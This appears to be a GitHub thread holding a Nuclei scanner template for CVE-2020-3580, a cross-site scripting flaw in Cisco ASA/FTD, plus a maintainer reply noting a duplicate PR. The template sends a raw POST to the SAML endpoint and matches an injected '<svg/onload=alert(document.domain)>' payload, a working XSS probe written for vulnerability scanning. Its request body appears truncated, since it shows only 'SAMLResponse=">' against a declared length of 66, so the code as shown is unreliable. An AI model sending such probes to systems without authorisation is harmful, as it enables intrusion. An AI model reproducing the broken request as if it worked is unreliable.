CVE-2020-3580 - https://nvd.nist.gov/vuln/detail/CVE-2020-3580
```yaml
id: CVE-2020-3580

info:
  name: CVE-2020-3580
  author: Mikey96
  severity: Medium
  description: CVE-2020-3580 - Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software XSS

requests:
  - raw:
      - |
        POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
        Host: {{Hostname}}
        Cookie: webvpnlogin=1; webvpnLang=en
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-GB,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 66
        Upgrade-Insecure-Requests: 1
        Te: trailers
        Connection: close

        SAMLResponse=">

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<svg/onload=alert(document.domain)>'
        part: body
```
Thank you @mikey96 for sharing this. Unfortunately, we already have a PR under review for this CVE: #1773